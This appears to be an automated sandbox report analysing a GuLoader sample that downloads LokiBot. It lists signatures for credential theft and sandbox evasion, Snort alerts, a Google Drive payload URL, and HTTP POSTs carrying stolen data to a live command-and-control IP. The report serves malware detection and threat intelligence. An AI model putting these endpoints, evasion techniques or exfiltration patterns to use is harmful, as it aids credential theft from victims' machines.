Windows Analysis Report SecuriteInfo.com.__vbaHresultCheckObj.22789.613

Overview

General Information

Sample Name: SecuriteInfo.com.__vbaHresultCheckObj.22789.613 (renamed file extension from 613 to exe)
Analysis ID: 483722
MD5: 308fb834ee02960ec122cf34712fa871
SHA1: 3162aff052c28b2ebf265eaaf5eadd0311e4299d
SHA256: a08af8c30e5a30a847fc94e370082ff8b9c9c7d5317d4fed0c3b4bc5854a496f
Tags: exe
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Multi AV Scanner detection for submitted file
GuLoader behavior detected
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Hides threads from debuggers
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Tries to steal Mail credentials (via file access)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000000.00000002.503499325.0000000002AD0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=16hJeQVa7vEC"}
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Virustotal: Detection: 23% Perma Link
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe ReversingLabs: Detection: 15%
Multi AV Scanner detection for domain / URL
Source: http://136.243.159.53/~element/page.php?id=121 Virustotal: Detection: 6% Perma Link

Compliance:

barindex
Uses 32bit PE files
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 172.217.168.78:443 -> 192.168.2.3:49790 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.65:443 -> 192.168.2.3:49791 version: TLS 1.2

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49792 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49792 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49792 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49792 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2410 WEB-PHP IGeneric Free Shopping Cart page.php access 192.168.2.3:49792 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49793 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49793 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49793 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49793 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2410 WEB-PHP IGeneric Free Shopping Cart page.php access 192.168.2.3:49793 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49794 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49794 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49794 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49794 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2410 WEB-PHP IGeneric Free Shopping Cart page.php access 192.168.2.3:49794 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49795 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49795 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49795 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49795 -> 136.243.159.53:80
Source: Traffic Snort IDS: 2410 WEB-PHP IGeneric Free Shopping Cart page.php access 192.168.2.3:49795 -> 136.243.159.53:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=download&id=16hJeQVa7vEC
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: HETZNER-ASDE HETZNER-ASDE
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 136.243.159.53 136.243.159.53
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=16hJeQVa7vECqqXwxmeW5i0BX_hPCAorF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v3agssaj4m1da9uvntfjbdrnuso7gs0u/1631701050000/14094524972347321979/*/16hJeQVa7vECqqXwxmeW5i0BX_hPCAorF?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-5o-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /~element/page.php?id=121 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.243.159.53Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA1747BCContent-Length: 190Connection: close
Source: global traffic HTTP traffic detected: POST /~element/page.php?id=121 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.243.159.53Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA1747BCContent-Length: 190Connection: close
Source: global traffic HTTP traffic detected: POST /~element/page.php?id=121 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.243.159.53Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA1747BCContent-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /~element/page.php?id=121 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.243.159.53Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA1747BCContent-Length: 163Connection: close
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown TCP traffic detected without corresponding DNS query: 136.243.159.53
Source: unknown TCP traffic detected without corresponding DNS query: 136.243.159.53
Source: unknown TCP traffic detected without corresponding DNS query: 136.243.159.53
Source: unknown TCP traffic detected without corresponding DNS query: 136.243.159.53
Source: unknown TCP traffic detected without corresponding DNS query: 136.243.159.53
Source: unknown TCP traffic detected without corresponding DNS query: 136.243.159.53
Source: unknown TCP traffic detected without corresponding DNS query: 136.243.159.53
Source: unknown TCP traffic detected without corresponding DNS query: 136.243.159.53
Source: unknown TCP traffic detected without corresponding DNS query: 136.243.159.53
Source: unknown TCP traffic detected without corresponding DNS query: 136.243.159.53
Source: unknown TCP traffic detected without corresponding DNS query: 136.243.159.53
Source: unknown TCP traffic detected without corresponding DNS query: 136.243.159.53
Source: unknown TCP traffic detected without corresponding DNS query: 136.243.159.53
Source: unknown TCP traffic detected without corresponding DNS query: 136.243.159.53
Source: unknown TCP traffic detected without corresponding DNS query: 136.243.159.53
Source: unknown TCP traffic detected without corresponding DNS query: 136.243.159.53
Source: unknown TCP traffic detected without corresponding DNS query: 136.243.159.53
Source: unknown TCP traffic detected without corresponding DNS query: 136.243.159.53
Source: unknown TCP traffic detected without corresponding DNS query: 136.243.159.53
Source: unknown TCP traffic detected without corresponding DNS query: 136.243.159.53
Source: unknown TCP traffic detected without corresponding DNS query: 136.243.159.53
Source: unknown TCP traffic detected without corresponding DNS query: 136.243.159.53
Source: unknown TCP traffic detected without corresponding DNS query: 136.243.159.53
Source: unknown TCP traffic detected without corresponding DNS query: 136.243.159.53
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Sep 2021 10:18:26 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732429567.00000000008D8000.00000004.00000020.sdmp String found in binary or memory: http://136.243.159.53/~element/page.php?id=121
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732429567.00000000008D8000.00000004.00000020.sdmp String found in binary or memory: http://136.243.159.53/~element/page.php?id=121.
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000003.724075568.000000000093F000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000003.722922786.0000000000938000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000003.724075568.000000000093F000.00000004.00000001.sdmp String found in binary or memory: https://doc-0c-5o-docs.googleusercontent.com/
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000003.724075568.000000000093F000.00000004.00000001.sdmp String found in binary or memory: https://doc-0c-5o-docs.googleusercontent.com/-
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000003.722932523.0000000000940000.00000004.00000001.sdmp, SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732485311.0000000000924000.00000004.00000020.sdmp, SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000003.722922786.0000000000938000.00000004.00000001.sdmp String found in binary or memory: https://doc-0c-5o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v3agssaj
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000003.724075568.000000000093F000.00000004.00000001.sdmp String found in binary or memory: https://doc-0c-5o-docs.googleusercontent.com/tography
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732429567.00000000008D8000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732429567.00000000008D8000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=16hJeQVa7vECqqXwxmeW5i0BX_hPCAorF
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732625102.0000000002270000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=16hJeQVa7vECqqXwxmeW5i0BX_hPCAorFwininet.dllMozilla/5
Source: unknown HTTP traffic detected: POST /~element/page.php?id=121 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.243.159.53Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BA1747BCContent-Length: 190Connection: close
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=16hJeQVa7vECqqXwxmeW5i0BX_hPCAorF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v3agssaj4m1da9uvntfjbdrnuso7gs0u/1631701050000/14094524972347321979/*/16hJeQVa7vECqqXwxmeW5i0BX_hPCAorF?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-5o-docs.googleusercontent.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 172.217.168.78:443 -> 192.168.2.3:49790 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.65:443 -> 192.168.2.3:49791 version: TLS 1.2

System Summary:

barindex
Potential malicious icon found
Source: initial sample Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Uses 32bit PE files
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Detected potential crypto function
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD588F 0_2_02AD588F
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD0688 0_2_02AD0688
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD0E9C 0_2_02AD0E9C
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD5491 0_2_02AD5491
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD58DE 0_2_02AD58DE
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD987C 0_2_02AD987C
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD5B66 0_2_02AD5B66
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD12AF 0_2_02AD12AF
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD98AF 0_2_02AD98AF
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD2EAE 0_2_02AD2EAE
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD0EA9 0_2_02AD0EA9
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD84A7 0_2_02AD84A7
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD9AA1 0_2_02AD9AA1
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD20BC 0_2_02AD20BC
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD2AB1 0_2_02AD2AB1
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD60B1 0_2_02AD60B1
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD3AB3 0_2_02AD3AB3
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD8E8D 0_2_02AD8E8D
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD4689 0_2_02AD4689
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD6081 0_2_02AD6081
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD8E9D 0_2_02AD8E9D
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD0E99 0_2_02AD0E99
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD829A 0_2_02AD829A
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD8CE9 0_2_02AD8CE9
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD36E8 0_2_02AD36E8
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD0AE4 0_2_02AD0AE4
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD8AE1 0_2_02AD8AE1
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD1CFE 0_2_02AD1CFE
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD2AF0 0_2_02AD2AF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD30CC 0_2_02AD30CC
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD08C4 0_2_02AD08C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD20C7 0_2_02AD20C7
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD0AC2 0_2_02AD0AC2
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD8E2D 0_2_02AD8E2D
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD6035 0_2_02AD6035
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD0A30 0_2_02AD0A30
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD4408 0_2_02AD4408
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD1000 0_2_02AD1000
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD0A17 0_2_02AD0A17
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD1417 0_2_02AD1417
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD327C 0_2_02AD327C
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD1C74 0_2_02AD1C74
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD9277 0_2_02AD9277
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD2672 0_2_02AD2672
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD4A72 0_2_02AD4A72
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD3A45 0_2_02AD3A45
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD4DA9 0_2_02AD4DA9
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD5FBB 0_2_02AD5FBB
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD09BA 0_2_02AD09BA
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD39B1 0_2_02AD39B1
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD8BB3 0_2_02AD8BB3
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD2384 0_2_02AD2384
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD5582 0_2_02AD5582
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD159D 0_2_02AD159D
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD8D9D 0_2_02AD8D9D
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD7B98 0_2_02AD7B98
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD3F96 0_2_02AD3F96
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD1F91 0_2_02AD1F91
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD07E7 0_2_02AD07E7
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD07E1 0_2_02AD07E1
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD89F6 0_2_02AD89F6
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD05F3 0_2_02AD05F3
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD07C3 0_2_02AD07C3
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD47D0 0_2_02AD47D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD4F3F 0_2_02AD4F3F
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD833A 0_2_02AD833A
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD4935 0_2_02AD4935
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD2F08 0_2_02AD2F08
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD4102 0_2_02AD4102
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD111F 0_2_02AD111F
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD8D7E 0_2_02AD8D7E
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD614D 0_2_02AD614D
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD7D4A 0_2_02AD7D4A
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD5F5B 0_2_02AD5F5B
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD9955 0_2_02AD9955
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD1350 0_2_02AD1350
Contains functionality to call native functions
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD0E9C NtWriteVirtualMemory,TerminateProcess, 0_2_02AD0E9C
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD5491 NtWriteVirtualMemory, 0_2_02AD5491
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD944B NtProtectVirtualMemory, 0_2_02AD944B
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD5B66 NtAllocateVirtualMemory, 0_2_02AD5B66
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD2EAE NtWriteVirtualMemory, 0_2_02AD2EAE
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD50B2 NtWriteVirtualMemory, 0_2_02AD50B2
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD4689 NtWriteVirtualMemory, 0_2_02AD4689
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD5C2A NtAllocateVirtualMemory, 0_2_02AD5C2A
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD940C NtProtectVirtualMemory, 0_2_02AD940C
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD2672 NtWriteVirtualMemory, 0_2_02AD2672
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD4A72 NtWriteVirtualMemory, 0_2_02AD4A72
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD4DA9 NtWriteVirtualMemory, 0_2_02AD4DA9
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD7B98 NtWriteVirtualMemory, 0_2_02AD7B98
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD1F91 NtWriteVirtualMemory, 0_2_02AD1F91
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD05F3 NtWriteVirtualMemory, 0_2_02AD05F3
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD47D0 NtWriteVirtualMemory, 0_2_02AD47D0
